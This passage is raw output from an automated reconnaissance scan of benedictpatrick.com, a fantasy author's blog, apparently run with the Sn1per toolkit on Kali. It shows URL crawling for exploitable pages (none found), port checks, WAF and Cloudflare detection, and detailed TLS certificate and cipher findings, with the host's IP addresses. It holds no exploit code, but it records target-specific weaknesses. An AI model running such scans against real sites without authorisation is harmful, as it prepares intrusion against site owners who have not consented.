  2663. |_[ + ] [ 7 / 39 ]-[23:34:37] [ - ] 
  2664. |_[ + ] Target:: [ http://benedictpatrick.com/2017/05/ ]
  2665. |_[ + ] Exploit:: 
  2666. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:2a01:9cc0:0:1:1a:3:0:5e:80 
  2667. |_[ + ] More details:: 
  2668. |_[ + ] Found:: UNIDENTIFIED
  2669. 
  2670.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2671. |_[ + ] [ 8 / 39 ]-[23:34:37] [ - ] 
  2672. |_[ + ] Target:: [ http://benedictpatrick.com/2017/07/ ]
  2673. |_[ + ] Exploit:: 
  2674. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:2a01:9cc0:0:1:1a:3:0:5e:80 
  2675. |_[ + ] More details:: 
  2676. |_[ + ] Found:: UNIDENTIFIED
  2677. 
  2678.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2679. |_[ + ] [ 9 / 39 ]-[23:34:38] [ - ] 
  2680. |_[ + ] Target:: [ http://benedictpatrick.com/2016/04/ ]
  2681. |_[ + ] Exploit:: 
  2682. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:2a01:9cc0:0:1:1a:3:0:5e:80 
  2683. |_[ + ] More details:: 
  2684. |_[ + ] Found:: UNIDENTIFIED
  2685. 
  2686.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2687. |_[ + ] [ 10 / 39 ]-[23:34:38] [ - ] 
  2688. |_[ + ] Target:: [ http://benedictpatrick.com/2016/03/ ]
  2689. |_[ + ] Exploit:: 
  2690. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:2a01:9cc0:0:1:1a:3:0:5e:80 
  2691. |_[ + ] More details:: 
  2692. |_[ + ] Found:: UNIDENTIFIED
  2693. 
  2694.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2695. |_[ + ] [ 11 / 39 ]-[23:34:39] [ - ] 
  2696. |_[ + ] Target:: [ http://benedictpatrick.com/lost-lore/ ]
  2697. |_[ + ] Exploit:: 
  2698. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:2a01:9cc0:0:1:1a:3:0:5e:80 
  2699. |_[ + ] More details:: 
  2700. |_[ + ] Found:: UNIDENTIFIED
  2701. 
  2702.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2703. |_[ + ] [ 12 / 39 ]-[23:34:39] [ - ] 
  2704. |_[ + ] Target:: [ http://benedictpatrick.com/?m=201607 ]
  2705. |_[ + ] Exploit:: 
  2706. |_[ + ] Information Server:: HTTP/1.1 301 Moved Permanently, Server: nginx , IP:2a01:9cc0:0:1:1a:3:0:5e:80 
  2707. |_[ + ] More details:: 
  2708. |_[ + ] Found:: UNIDENTIFIED
  2709. 
  2710.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2711. |_[ + ] [ 13 / 39 ]-[23:34:40] [ - ] 
  2712. |_[ + ] Target:: [ http://benedictpatrick.com/?m=201702 ]
  2713. |_[ + ] Exploit:: 
  2714. |_[ + ] Information Server:: HTTP/1.1 301 Moved Permanently, Server: nginx , IP:2a01:9cc0:0:1:1a:3:0:5e:80 
  2715. |_[ + ] More details:: 
  2716. |_[ + ] Found:: UNIDENTIFIED
  2717. 
  2718.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2719. |_[ + ] [ 14 / 39 ]-[23:34:40] [ - ] 
  2720. |_[ + ] Target:: [ http://benedictpatrick.com/?p=114 ]
  2721. |_[ + ] Exploit:: 
  2722. |_[ + ] Information Server:: HTTP/1.1 301 Moved Permanently, Server: nginx , IP:2a01:9cc0:0:1:1a:3:0:5e:80 
  2723. |_[ + ] More details:: 
  2724. |_[ + ] Found:: UNIDENTIFIED
  2725. 
  2726.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2727. |_[ + ] [ 15 / 39 ]-[23:34:40] [ - ] 
  2728. |_[ + ] Target:: [ http://benedictpatrick.com/?m=201710 ]
  2729. |_[ + ] Exploit:: 
  2730. |_[ + ] Information Server:: HTTP/1.1 301 Moved Permanently, Server: nginx , IP:2a01:9cc0:0:1:1a:3:0:5e:80 
  2731. |_[ + ] More details:: 
  2732. |_[ + ] Found:: UNIDENTIFIED
  2733. 
  2734.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2735. |_[ + ] [ 16 / 39 ]-[23:34:41] [ - ] 
  2736. |_[ + ] Target:: [ http://benedictpatrick.com/?m=201708 ]
  2737. |_[ + ] Exploit:: 
  2738. |_[ + ] Information Server:: HTTP/1.1 301 Moved Permanently, Server: nginx , IP:2a01:9cc0:0:1:1a:3:0:5e:80 
  2739. |_[ + ] More details:: 
  2740. |_[ + ] Found:: UNIDENTIFIED
  2741. 
  2742.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2743. |_[ + ] [ 17 / 39 ]-[23:34:41] [ - ] 
  2744. |_[ + ] Target:: [ http://benedictpatrick.com/about-the-author/ ]
  2745. |_[ + ] Exploit:: 
  2746. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:2a01:9cc0:0:1:1a:3:0:5e:80 
  2747. |_[ + ] More details:: 
  2748. |_[ + ] Found:: UNIDENTIFIED
  2749. 
  2750.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2751. |_[ + ] [ 18 / 39 ]-[23:34:42] [ - ] 
  2752. |_[ + ] Target:: [ http://benedictpatrick.com/?m=201610 ]
  2753. |_[ + ] Exploit:: 
  2754. |_[ + ] Information Server:: HTTP/1.1 301 Moved Permanently, Server: nginx , IP:2a01:9cc0:0:1:1a:3:0:5e:80 
  2755. |_[ + ] More details:: 
  2756. |_[ + ] Found:: UNIDENTIFIED
  2757. 
  2758.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2759. |_[ + ] [ 19 / 39 ]-[23:34:42] [ - ] 
  2760. |_[ + ] Target:: [ http://benedictpatrick.com/?m=201603 ]
  2761. |_[ + ] Exploit:: 
  2762. |_[ + ] Information Server:: HTTP/1.1 301 Moved Permanently, Server: nginx , IP:2a01:9cc0:0:1:1a:3:0:5e:80 
  2763. |_[ + ] More details:: 
  2764. |_[ + ] Found:: UNIDENTIFIED
  2765. 
  2766.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2767. |_[ + ] [ 20 / 39 ]-[23:34:43] [ - ] 
  2768. |_[ + ] Target:: [ http://benedictpatrick.com/fabulous-fantasy-fundraiser/ ]
  2769. |_[ + ] Exploit:: 
  2770. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:2a01:9cc0:0:1:1a:3:0:5e:80 
  2771. |_[ + ] More details:: 
  2772. |_[ + ] Found:: UNIDENTIFIED
  2773. 
  2774.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2775. |_[ + ] [ 21 / 39 ]-[23:34:43] [ - ] 
  2776. |_[ + ] Target:: [ http://benedictpatrick.com/?m=201604 ]
  2777. |_[ + ] Exploit:: 
  2778. |_[ + ] Information Server:: HTTP/1.1 301 Moved Permanently, Server: nginx , IP:2a01:9cc0:0:1:1a:3:0:5e:80 
  2779. |_[ + ] More details:: 
  2780. |_[ + ] Found:: UNIDENTIFIED
  2781. 
  2782.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2783. |_[ + ] [ 22 / 39 ]-[23:34:44] [ - ] 
  2784. |_[ + ] Target:: [ http://benedictpatrick.com/why-i-read-indie/ ]
  2785. |_[ + ] Exploit:: 
  2786. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:2a01:9cc0:0:1:1a:3:0:5e:80 
  2787. |_[ + ] More details:: 
  2788. |_[ + ] Found:: UNIDENTIFIED
  2789. 
  2790.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2791. |_[ + ] [ 23 / 39 ]-[23:34:44] [ - ] 
  2792. |_[ + ] Target:: [ http://benedictpatrick.com/what-is-the-yarnsworld/ ]
  2793. |_[ + ] Exploit:: 
  2794. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:2a01:9cc0:0:1:1a:3:0:5e:80 
  2795. |_[ + ] More details:: 
  2796. |_[ + ] Found:: UNIDENTIFIED
  2797. 
  2798.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2799. |_[ + ] [ 24 / 39 ]-[23:34:45] [ - ] 
  2800. |_[ + ] Target:: [ http://benedictpatrick.com/queen-alisi-and-the-whale/ ]
  2801. |_[ + ] Exploit:: 
  2802. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:2a01:9cc0:0:1:1a:3:0:5e:80 
  2803. |_[ + ] More details:: 
  2804. |_[ + ] Found:: UNIDENTIFIED
  2805. 
  2806.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2807. |_[ + ] [ 25 / 39 ]-[23:34:45] [ - ] 
  2808. |_[ + ] Target:: [ http://benedictpatrick.com/let-me-read-you-a-folktale/ ]
  2809. |_[ + ] Exploit:: 
  2810. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:2a01:9cc0:0:1:1a:3:0:5e:80 
  2811. |_[ + ] More details:: 
  2812. |_[ + ] Found:: UNIDENTIFIED
  2813. 
  2814.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2815. |_[ + ] [ 26 / 39 ]-[23:34:46] [ - ] 
  2816. |_[ + ] Target:: [ http://benedictpatrick.com/the-magpie-king-and-the-black-squirrel/ ]
  2817. |_[ + ] Exploit:: 
  2818. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:2a01:9cc0:0:1:1a:3:0:5e:80 
  2819. |_[ + ] More details:: 
  2820. |_[ + ] Found:: UNIDENTIFIED
  2821. 
  2822.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2823. |_[ + ] [ 27 / 39 ]-[23:34:47] [ - ] 
  2824. |_[ + ] Target:: [ http://benedictpatrick.com/can-we-judge-books-by-their-covers/ ]
  2825. |_[ + ] Exploit:: 
  2826. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:2a01:9cc0:0:1:1a:3:0:5e:80 
  2827. |_[ + ] More details:: 
  2828. |_[ + ] Found:: UNIDENTIFIED
  2829. 
  2830.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2831. |_[ + ] [ 28 / 39 ]-[23:34:47] [ - ] 
  2832. |_[ + ] Target:: [ http://benedictpatrick.com/star-wars-rogue-one-first-impressions-video/ ]
  2833. |_[ + ] Exploit:: 
  2834. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:2a01:9cc0:0:1:1a:3:0:5e:80 
  2835. |_[ + ] More details:: 
  2836. |_[ + ] Found:: UNIDENTIFIED
  2837. 
  2838.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2839. |_[ + ] [ 29 / 39 ]-[23:34:48] [ - ] 
  2840. |_[ + ] Target:: [ http://benedictpatrick.com/wp-content/uploads/2016/06/BlackSquirrel.pdf ]
  2841. |_[ + ] Exploit:: 
  2842. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:2a01:9cc0:0:1:1a:3:0:5e:80 
  2843. |_[ + ] More details:: 
  2844. |_[ + ] Found:: UNIDENTIFIED
  2845. 
  2846.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2847. |_[ + ] [ 30 / 39 ]-[23:34:49] [ - ] 
  2848. |_[ + ] Target:: [ http://benedictpatrick.com/cover-reveal-where-the-waters-turn-black/ ]
  2849. |_[ + ] Exploit:: 
  2850. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:2a01:9cc0:0:1:1a:3:0:5e:80 
  2851. |_[ + ] More details:: 
  2852. |_[ + ] Found:: UNIDENTIFIED
  2853. 
  2854.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2855. |_[ + ] [ 31 / 39 ]-[23:34:49] [ - ] 
  2856. |_[ + ] Target:: [ http://benedictpatrick.com/wp-content/uploads/2016/03/Chapter-Sample.pdf ]
  2857. |_[ + ] Exploit:: 
  2858. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:2a01:9cc0:0:1:1a:3:0:5e:80 
  2859. |_[ + ] More details:: 
  2860. |_[ + ] Found:: UNIDENTIFIED
  2861. 
  2862.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2863. |_[ + ] [ 32 / 39 ]-[23:34:50] [ - ] 
  2864. |_[ + ] Target:: [ http://benedictpatrick.com/they-mostly-come-out-at-night-releases-16th-june/ ]
  2865. |_[ + ] Exploit:: 
  2866. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:2a01:9cc0:0:1:1a:3:0:5e:80 
  2867. |_[ + ] More details:: 
  2868. |_[ + ] Found:: UNIDENTIFIED
  2869. 
  2870.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2871. |_[ + ] [ 33 / 39 ]-[23:34:50] [ - ] 
  2872. |_[ + ] Target:: [ http://benedictpatrick.com/where-the-waters-turn-black-wins-the-spfbo-cover-contest/ ]
  2873. |_[ + ] Exploit:: 
  2874. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:2a01:9cc0:0:1:1a:3:0:5e:80 
  2875. |_[ + ] More details:: 
  2876. |_[ + ] Found:: UNIDENTIFIED
  2877. 
  2878.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2879. |_[ + ] [ 34 / 39 ]-[23:34:51] [ - ] 
  2880. |_[ + ] Target:: [ http://benedictpatrick.com/cover-reveal-for-those-brave-foolish-souls-from-the-city-of-swords/ ]
  2881. |_[ + ] Exploit:: 
  2882. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:2a01:9cc0:0:1:1a:3:0:5e:80 
  2883. |_[ + ] More details:: 
  2884. |_[ + ] Found:: UNIDENTIFIED
  2885. 
  2886.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2887. |_[ + ] [ 35 / 39 ]-[23:34:51] [ - ] 
  2888. |_[ + ] Target:: [ http://benedictpatrick.com/where-the-waters-turn-black-the-next-yarnsworld-novel-has-been-released/ ]
  2889. |_[ + ] Exploit:: 
  2890. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:2a01:9cc0:0:1:1a:3:0:5e:80 
  2891. |_[ + ] More details:: 
  2892. |_[ + ] Found:: UNIDENTIFIED
  2893. 
  2894.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2895. |_[ + ] [ 36 / 39 ]-[23:34:52] [ - ] 
  2896. |_[ + ] Target:: [ http://benedictpatrick.com/do-you-have-a-knack-for-reading-get-an-early-copy-of-the-next-yarnsworld-book/ ]
  2897. |_[ + ] Exploit:: 
  2898. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:2a01:9cc0:0:1:1a:3:0:5e:80 
  2899. |_[ + ] More details:: 
  2900. |_[ + ] Found:: UNIDENTIFIED
  2901. 
  2902.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2903. |_[ + ] [ 37 / 39 ]-[23:34:52] [ - ] 
  2904. |_[ + ] Target:: [ http://benedictpatrick.com/launch-day-those-brave-foolish-souls-from-the-city-of-swords-is-out-and-is-only-99c99p-for-the-next-few-days/ ]
  2905. |_[ + ] Exploit:: 
  2906. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:2a01:9cc0:0:1:1a:3:0:5e:80 
  2907. |_[ + ] More details:: 
  2908. |_[ + ] Found:: UNIDENTIFIED
  2909. 
  2910.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2911. |_[ + ] [ 38 / 39 ]-[23:34:53] [ - ] 
  2912. |_[ + ] Target:: [ http://benedictpatrick.com/read-and-chat-about-they-mostly-come-out-at-night-this-month-on-reddit-fantasy-also-a-new-cover-for-the-book/ ]
  2913. |_[ + ] Exploit:: 
  2914. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:2a01:9cc0:0:1:1a:3:0:5e:80 
  2915. |_[ + ] More details:: 
  2916. |_[ + ] Found:: UNIDENTIFIED
  2917.  
  2918. [ INFO ] [ Shutting down ]
  2919. [ INFO ] [ End of process INURLBR at [05-01-2018 23:34:53]
  2920. [ INFO ] [ TOTAL FILTERED VALUES ]:: [ 0 ]
  2921. [ INFO ] [ OUTPUT FILE ]:: [ /usr/share/sniper/output/inurlbr-benedictpatrick.com.txt ]
  2922. |_________________________________________________________________________________________
  2923.  
  2924. \_________________________________________________________________________________________/
  2925.  
  2926.  + -- --=[Port 110 closed... skipping.
  2927.  + -- --=[Port 111 closed... skipping.
  2928.  + -- --=[Port 135 closed... skipping.
  2929.  + -- --=[Port 139 closed... skipping.
  2930.  + -- --=[Port 161 closed... skipping.
  2931.  + -- --=[Port 162 closed... skipping.
  2932.  + -- --=[Port 389 closed... skipping.
  2933.  + -- --=[Port 443 opened... running tests...
  2934.  + -- ----------------------------=[Checking for WAF]=------------------------ -- +
  2935.  
  2936. ^ ^
  2937. _ __ _ ____ _ __ _ _ ____
  2938. ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
  2939. | V V // o // _/ | V V // 0 // 0 // _/
  2940. |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
  2941. <
  2942. ...'
  2943.  
  2944. WAFW00F - Web Application Firewall Detection Tool
  2945.  
  2946. By Sandro Gauci && Wendel G. Henrique
  2947.  
  2948. Checking https://benedictpatrick.com
  2949.  
  2950.  + -- ----------------------------=[Checking Cloudflare]=--------------------- -- +
  2951. ____ _ _ _____ _ _
  2952. / ___| | ___ _ _ __| | ___|_ _(_) |
  2953. | | | |/ _ \| | | |/ _` | |_ / _` | | |
  2954. | |___| | (_) | |_| | (_| | _| (_| | | |
  2955. \____|_|\___/ \__,_|\__,_|_| \__,_|_|_|
  2956. v1.0.1 by m0rtem
  2957.  
  2958.  
  2959. [23:34:55] Initializing CloudFail - the date is: 05/01/2018
  2960. [23:34:55] Fetching initial information from: benedictpatrick.com...
  2961. [23:34:55] Server IP: 185.119.174.103
  2962. [23:34:55] Testing if benedictpatrick.com is on the Cloudflare network...
  2963. [23:34:55] benedictpatrick.com is not part of the Cloudflare network, quitting...
  2964.  + -- ----------------------------=[Gathering HTTP Info]=--------------------- -- +
  2965. https://benedictpatrick.com [503 Service Unavailable] Email[support@webfaction.com], HTTPServer[nginx], IP[185.119.174.103], Title[WebFaction - Coming soon: Another fine website hosted by WebFaction], nginx
  2966.  
  2967.  + -- ----------------------------=[Gathering SSL/TLS Info]=------------------ -- +
  2968.  
  2969.  
  2970.  
  2971. AVAILABLE PLUGINS
  2972. -----------------
  2973.  
  2974. PluginSessionResumption
  2975. PluginOpenSSLCipherSuites
  2976. PluginHeartbleed
  2977. PluginSessionRenegotiation
  2978. PluginChromeSha1Deprecation
  2979. PluginHSTS
  2980. PluginCertInfo
  2981. PluginCompression
  2982.  
  2983.  
  2984.  
  2985. CHECKING HOST(S) AVAILABILITY
  2986. -----------------------------
  2987.  
  2988. benedictpatrick.com:443 => 2a01:9cc0:0:1:1a:3:0:5e:443
  2989.  
  2990.  
  2991.  
  2992. SCAN RESULTS FOR BENEDICTPATRICK.COM:443 - 2A01:9CC0:0:1:1A:3:0:5E:443
  2993. ----------------------------------------------------------------------
  2994.  
  2995. * Deflate Compression:
  2996. OK - Compression disabled
  2997.  
  2998. * Session Renegotiation:
  2999. Client-initiated Renegotiations: OK - Rejected
  3000. Secure Renegotiation: OK - Supported
  3001.  
  3002. * Certificate - Content:
  3003. SHA1 Fingerprint: 05d5da59c049fbee09ec41a1ac4940e8486cb675
  3004. Common Name: *.webfaction.com
  3005. Issuer: Trustwave Organization Validation SHA256 CA, Level 1
  3006. Serial Number: 06A836FDD51B1B49AD03BADF3D066C3B2BA71A
  3007. Not Before: Jan 16 09:27:58 2017 GMT
  3008. Not After: Jan 16 15:27:58 2020 GMT
  3009. Signature Algorithm: sha256WithRSAEncryption
  3010. Public Key Algorithm: rsaEncryption
  3011. Key Size: 2048 bit
  3012. Exponent: 65537 (0x10001)
  3013. X509v3 Subject Alternative Name: {'DNS': ['*.webfaction.com', 'webfaction.com']}
  3014.  
  3015. * Certificate - Trust:
  3016. Hostname Validation: FAILED - Certificate does NOT match benedictpatrick.com
  3017. Google CA Store (09/2015): FAILED - Certificate is NOT Trusted: unable to get local issuer certificate
  3018. Java 6 CA Store (Update 65): OK - Certificate is trusted
  3019. Microsoft CA Store (09/2015): OK - Certificate is trusted
  3020. Mozilla NSS CA Store (09/2015): OK - Certificate is trusted
  3021. Apple CA Store (OS X 10.10.5): OK - Certificate is trusted
  3022. Certificate Chain Received: ['*.webfaction.com', 'Trustwave Organization Validation SHA256 CA, Level 1']
  3023.  
  3024. * Certificate - OCSP Stapling:
  3025. NOT SUPPORTED - Server did not send back an OCSP response.
  3026.  
  3027. * Session Resumption:
  3028. With Session IDs: OK - Supported (5 successful, 0 failed, 0 errors, 5 total attempts).
  3029. With TLS Session Tickets: OK - Supported
  3030.  
  3031. * SSLV2 Cipher Suites:
  3032. Server rejected all cipher suites.
  3033.  
  3034. * SSLV3 Cipher Suites:
  3035. Server rejected all cipher suites.
  3036.  
  3037.  
  3038.  
  3039. SCAN COMPLETED IN 1.89 S
  3040. ------------------------
  3041. Version: 1.11.10-static
  3042. OpenSSL 1.0.2-chacha (1.0.2g-dev)
  3043. 
  3044. Testing SSL server benedictpatrick.com on port 443 using SNI name benedictpatrick.com
  3045.  
  3046. TLS Fallback SCSV:
  3047. Server supports TLS Fallback SCSV
  3048.  
  3049. TLS renegotiation:
  3050. Secure session renegotiation supported
  3051.  
  3052. TLS Compression:
  3053. Compression disabled
  3054.  
  3055. Heartbleed:
  3056. TLS 1.2 not vulnerable to heartbleed
  3057. TLS 1.1 not vulnerable to heartbleed
  3058. TLS 1.0 not vulnerable to heartbleed
  3059.  
  3060. Supported Server Cipher(s):
  3061. Preferred TLSv1.2 128 bits ECDHE-RSA-AES128-GCM-SHA256  Curve P-256 DHE 256
  3062. Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-GCM-SHA384  Curve P-256 DHE 256
  3063. Accepted TLSv1.2 128 bits DHE-RSA-AES128-GCM-SHA256  DHE 2048 bits
  3064. Accepted TLSv1.2 256 bits DHE-RSA-AES256-GCM-SHA384  DHE 2048 bits
  3065. Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA256 Curve P-256 DHE 256
  3066. Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
  3067. Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA384 Curve P-256 DHE 256
  3068. Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
  3069. Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA256 DHE 2048 bits
  3070. Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
  3071. Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA256 DHE 2048 bits
  3072. Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
  3073. Accepted TLSv1.2 128 bits AES128-GCM-SHA256
  3074. Accepted TLSv1.2 256 bits AES256-GCM-SHA384
  3075. Accepted TLSv1.2 128 bits AES128-SHA256
  3076. Accepted TLSv1.2 256 bits AES256-SHA256
  3077. Accepted TLSv1.2 128 bits AES128-SHA
  3078. Accepted TLSv1.2 256 bits AES256-SHA
  3079. Accepted TLSv1.2 256 bits DHE-RSA-CAMELLIA256-SHA DHE 2048 bits
  3080. Accepted TLSv1.2 256 bits CAMELLIA256-SHA
  3081. Accepted TLSv1.2 128 bits DHE-RSA-CAMELLIA128-SHA DHE 2048 bits
  3082. Accepted TLSv1.2 128 bits CAMELLIA128-SHA
  3083. Accepted TLSv1.2 112 bits DES-CBC3-SHA 
  3084. Preferred TLSv1.1 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
  3085. Accepted TLSv1.1 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
  3086. Accepted TLSv1.1 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
  3087. Accepted TLSv1.1 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
  3088. Accepted TLSv1.1 128 bits AES128-SHA
  3089. Accepted TLSv1.1 256 bits AES256-SHA
  3090. Accepted TLSv1.1 256 bits DHE-RSA-CAMELLIA256-SHA DHE 2048 bits
  3091. Accepted TLSv1.1 256 bits CAMELLIA256-SHA
  3092. Accepted TLSv1.1 128 bits DHE-RSA-CAMELLIA128-SHA DHE 2048 bits
  3093. Accepted TLSv1.1 128 bits CAMELLIA128-SHA
  3094. Accepted TLSv1.1 112 bits DES-CBC3-SHA 
  3095. Preferred TLSv1.0 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
  3096. Accepted TLSv1.0 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
  3097. Accepted TLSv1.0 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
  3098. Accepted TLSv1.0 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
  3099. Accepted TLSv1.0 128 bits AES128-SHA
  3100. Accepted TLSv1.0 256 bits AES256-SHA
  3101. Accepted TLSv1.0 256 bits DHE-RSA-CAMELLIA256-SHA DHE 2048 bits
  3102. Accepted TLSv1.0 256 bits CAMELLIA256-SHA
  3103. Accepted TLSv1.0 128 bits DHE-RSA-CAMELLIA128-SHA DHE 2048 bits
  3104. Accepted TLSv1.0 128 bits CAMELLIA128-SHA
  3105. Accepted TLSv1.0 112 bits DES-CBC3-SHA 
  3106.  
  3107. SSL Certificate:
  3108. Signature Algorithm: sha256WithRSAEncryption
  3109. RSA Key Strength: 2048
  3110.  
  3111. Subject: *.webfaction.com
  3112. Altnames: DNS:*.webfaction.com, DNS:webfaction.com
  3113. Issuer: Trustwave Organization Validation SHA256 CA, Level 1
  3114.  
  3115. Not valid before: Jan 16 09:27:58 2017 GMT
  3116. Not valid after: Jan 16 15:27:58 2020 GMT
  3117. 
  3118. ###########################################################
  3119. testssl 2.9dev from https://testssl.sh/dev/
  3120. 
  3121. This program is free software. Distribution and
  3122. modification under GPLv2 permitted.
  3123. USAGE w/o ANY WARRANTY. USE IT AT YOUR OWN RISK!
  3124.  
  3125. Please file bugs @ https://testssl.sh/bugs/
  3126. 
  3127. ###########################################################
  3128.  
  3129. Using "OpenSSL 1.0.2-chacha (1.0.2i-dev)" [~183 ciphers]
  3130. on Kali:/usr/share/sniper/plugins/testssl.sh/bin/openssl.Linux.x86_64
  3131. (built: "Jun 22 19:32:29 2016", platform: "linux-x86_64")
  3132.  
  3133.  
  3134.  Start 2018-01-05 23:35:28 -->> 185.119.174.103:443 (benedictpatrick.com) <<--
  3135.  
  3136. further IP addresses: 2a01:9cc0:0:1:1a:3:0:5e
  3137. rDNS (185.119.174.103): web564.webfaction.com.
  3138. Service detected: HTTP
  3139.  
  3140.  
  3141.  Testing protocols via sockets except SPDY+HTTP2 
  3142.  
  3143.  SSLv2 not offered (OK)
  3144.  SSLv3 not offered (OK)
  3145.  TLS 1 offered
  3146.  TLS 1.1 offered
  3147.  TLS 1.2 offered (OK)
  3148.  TLS 1.3 not offered
  3149.  SPDY/NPN http/1.1 (advertised)
  3150.  HTTP2/ALPN http/1.1 (offered)
  3151.  
  3152.  Testing ~standard cipher categories 
  3153.  
  3154.  NULL ciphers (no encryption) not offered (OK)
  3155.  Anonymous NULL Ciphers (no authentication) not offered (OK)
  3156.  Export ciphers (w/o ADH+NULL) not offered (OK)
  3157.  LOW: 64 Bit + DES encryption (w/o export) not offered (OK)
  3158.  Weak 128 Bit ciphers (SEED, IDEA, RC[2,4]) not offered (OK)
  3159.  Triple DES Ciphers (Medium) offered
  3160.  High encryption (AES+Camellia, no AEAD) offered (OK)
  3161.  Strong encryption (AEAD ciphers) offered (OK)
  3162.  
  3163.  
  3164.  Testing robust (perfect) forward secrecy, (P)FS -- omitting Null Authentication/Encryption, 3DES, RC4 
  3165.  
  3166.  PFS is offered (OK) ECDHE-RSA-AES256-GCM-SHA384
  3167. ECDHE-RSA-AES256-SHA384 ECDHE-RSA-AES256-SHA
  3168. DHE-RSA-AES256-GCM-SHA384 DHE-RSA-AES256-SHA256
  3169. DHE-RSA-AES256-SHA DHE-RSA-CAMELLIA256-SHA
  3170. ECDHE-RSA-AES128-GCM-SHA256
  3171. ECDHE-RSA-AES128-SHA256 ECDHE-RSA-AES128-SHA
  3172. DHE-RSA-AES128-GCM-SHA256 DHE-RSA-AES128-SHA256
  3173. DHE-RSA-AES128-SHA DHE-RSA-CAMELLIA128-SHA
  3174.  Elliptic curves offered: secp256k1 prime256v1 secp384r1 secp521r1
  3175.  
  3176.  
  3177.  Testing server preferences 
  3178.  
  3179.  Has server cipher order? yes (OK)
  3180.  Negotiated protocol TLSv1.2
  3181.  Negotiated cipher ECDHE-RSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  3182.  Cipher order
  3183. TLSv1: ECDHE-RSA-AES128-SHA ECDHE-RSA-AES256-SHA DHE-RSA-AES128-SHA
  3184. DHE-RSA-AES256-SHA AES128-SHA AES256-SHA DHE-RSA-CAMELLIA256-SHA
  3185. CAMELLIA256-SHA DHE-RSA-CAMELLIA128-SHA CAMELLIA128-SHA
  3186. DES-CBC3-SHA
  3187. TLSv1.1: ECDHE-RSA-AES128-SHA ECDHE-RSA-AES256-SHA DHE-RSA-AES128-SHA
  3188. DHE-RSA-AES256-SHA AES128-SHA AES256-SHA DHE-RSA-CAMELLIA256-SHA
  3189. CAMELLIA256-SHA DHE-RSA-CAMELLIA128-SHA CAMELLIA128-SHA
  3190. DES-CBC3-SHA
